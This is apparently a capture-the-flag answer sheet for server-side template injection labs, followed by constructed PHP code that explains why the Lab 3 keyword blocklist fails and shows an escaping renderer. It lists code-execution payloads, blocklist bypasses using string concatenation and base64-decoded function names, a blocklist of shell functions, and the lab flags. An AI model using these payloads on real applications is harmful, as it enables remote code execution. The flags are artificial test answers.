Lab 1 - Basic SSTI Detection:
Probe: ?name=7*7
If output shows 49, the template evaluates expressions.
Flag: flag{ssti_basic_detection_math_probe}

Lab 2 - SSTI to RCE:
The template engine uses eval() on {%% code %%} blocks.
Payload: {%% echo system('id'); %%}
Or via expression: {{system('id')}}
Using any of: system, exec, passthru, shell_exec, phpinfo triggers the flag.
Flag: flag{ssti_rce_eval_template_engine}

Lab 3 - Filter Bypass:
Blocked keywords: system, exec, passthru, shell_exec, popen, proc_open, eval
Bypass via string concat: ?name=call_user_func('sys'.'tem','id')
Or: ?name=base64_decode('c3lzdGVt')('id') (base64 of "system")
Flag: flag{ssti_filter_bypass_variable_function}
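
Why the Lab 3 keyword blocklist fails and what replaces it, as an added example (not the lab's source code). The names blocklist_allows and render_safe are hypothetical; the blocklist and the sample inputs are the ones listed in the notes above, and the hardened renderer substitutes input as escaped data instead of evaluating it.

```php
<?php
// Added example: constructed code, not the lab's own implementation.

// Blocklist as listed in the Lab 3 notes.
const BLOCKED = ['system', 'exec', 'passthru', 'shell_exec', 'popen', 'proc_open', 'eval'];

// Hypothetical keyword filter: rejects input that contains a blocked word.
// It inspects the literal text only, so a function name that is assembled
// or decoded at run time never appears in the string it checks.
function blocklist_allows(string $input): bool
{
    foreach (BLOCKED as $word) {
        if (stripos($input, $word) !== false) {
            return false;
        }
    }
    return true;
}

// Hardened renderer: the template is a fixed, application-owned string.
// User input is only substituted as HTML-escaped data and is never passed
// to eval() or treated as template syntax (single pass, no re-expansion).
function render_safe(string $template, array $vars): string
{
    return preg_replace_callback(
        '/\{\{\s*(\w+)\s*\}\}/',
        function (array $m) use ($vars): string {
            $value = $vars[$m[1]] ?? '';
            return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        },
        $template
    );
}

// Inputs quoted from the lab notes above.
$inputs = [
    "7*7",
    "system('id')",
    "call_user_func('sys'.'tem','id')",
    "base64_decode('c3lzdGVt')('id')",
];

foreach ($inputs as $name) {
    printf("%-36s blocklist_allows=%s\n", $name, blocklist_allows($name) ? 'yes' : 'no');
    echo '  ', render_safe('Hello {{ name }}!', ['name' => $name]), "\n";
}
```

Only the input that spells a blocked word literally is rejected by the filter, while render_safe returns every input as inert text, including 7*7 left unevaluated.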